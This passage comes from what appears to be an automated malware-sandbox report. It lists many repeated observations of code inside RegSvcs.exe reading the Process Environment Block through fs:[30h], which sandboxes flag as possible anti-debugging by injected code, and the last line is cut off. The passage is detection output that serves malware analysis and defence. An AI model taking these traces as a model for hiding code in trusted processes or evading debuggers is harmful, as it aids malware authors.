Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129C182 mov eax, dword ptr fs:[00000030h] 4_2_0129C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AA185 mov eax, dword ptr fs:[00000030h] 4_2_012AA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A2990 mov eax, dword ptr fs:[00000030h] 4_2_012A2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0127B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0127B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0127B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013041E8 mov eax, dword ptr fs:[00000030h] 4_2_013041E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01344015 mov eax, dword ptr fs:[00000030h] 4_2_01344015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01344015 mov eax, dword ptr fs:[00000030h] 4_2_01344015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h] 4_2_012F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h] 4_2_012F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h] 4_2_012F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01332073 mov eax, dword ptr fs:[00000030h] 4_2_01332073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01341074 mov eax, dword ptr fs:[00000030h] 4_2_01341074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01290050 mov eax, dword ptr fs:[00000030h] 4_2_01290050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01290050 mov eax, dword ptr fs:[00000030h] 4_2_01290050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B90AF mov eax, dword ptr fs:[00000030h] 4_2_012B90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AF0BF mov ecx, dword ptr fs:[00000030h] 4_2_012AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h] 4_2_012AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h] 4_2_012AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279080 mov eax, dword ptr fs:[00000030h] 4_2_01279080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h] 4_2_012F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h] 4_2_012F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h] 4_2_012740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h] 4_2_012740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h] 4_2_012740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012758EC mov eax, dword ptr fs:[00000030h] 4_2_012758EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0129B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0129B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov ecx, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133131B mov eax, dword ptr fs:[00000030h] 4_2_0133131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127DB60 mov ecx, dword ptr fs:[00000030h] 4_2_0127DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h] 4_2_012A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h] 4_2_012A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127DB40 mov eax, dword ptr fs:[00000030h] 4_2_0127DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01348B58 mov eax, dword ptr fs:[00000030h] 4_2_01348B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127F358 mov eax, dword ptr fs:[00000030h] 4_2_0127F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h] 4_2_012A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h] 4_2_012A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h] 4_2_012A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01345BA5 mov eax, dword ptr fs:[00000030h] 4_2_01345BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h] 4_2_01281B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h] 4_2_01281B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132D380 mov ecx, dword ptr fs:[00000030h] 4_2_0132D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133138A mov eax, dword ptr fs:[00000030h] 4_2_0133138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AB390 mov eax, dword ptr fs:[00000030h] 4_2_012AB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A2397 mov eax, dword ptr fs:[00000030h] 4_2_012A2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129DBE9 mov eax, dword ptr fs:[00000030h] 4_2_0129DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h] 4_2_012F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h] 4_2_012F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h] 4_2_012B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h] 4_2_012B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01288A0A mov eax, dword ptr fs:[00000030h] 4_2_01288A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133AA16 mov eax, dword ptr fs:[00000030h] 4_2_0133AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133AA16 mov eax, dword ptr fs:[00000030h] 4_2_0133AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127AA16 mov eax, dword ptr fs:[00000030h] 4_2_0127AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127AA16 mov eax, dword ptr fs:[00000030h] 4_2_0127AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01293A1C mov eax, dword ptr fs:[00000030h] 4_2_01293A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01275210 mov eax, dword ptr fs:[00000030h] 4_2_01275210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01275210 mov ecx, dword ptr fs:[00000030h] 4_2_01275210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01275210 mov eax, dword ptr fs:[00000030h] 4_2_01275210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01275210 mov eax, dword ptr fs:[00000030h] 4_2_01275210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B927A mov eax, dword ptr fs:[00000030h] 4_2_012B927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132B260 mov eax, dword ptr fs:[00000030h] 4_2_0132B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132B260 mov eax, dword ptr fs:[00000030h] 4_2_0132B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01348A62 mov eax, dword ptr fs:[00000030h] 4_2_01348A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133EA55 mov eax, dword ptr fs:[00000030h] 4_2_0133EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279240 mov eax, dword ptr fs:[00000030h] 4_2_01279240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279240 mov eax, dword ptr fs:[00000030h] 4_2_01279240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279240 mov eax, dword ptr fs:[00000030h] 4_2_01279240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279240 mov eax, dword ptr fs:[00000030h] 4_2_01279240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01304257 mov eax, dword ptr fs:[00000030h] 4_2_01304257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h] 4_2_012752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h] 4_2_012752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]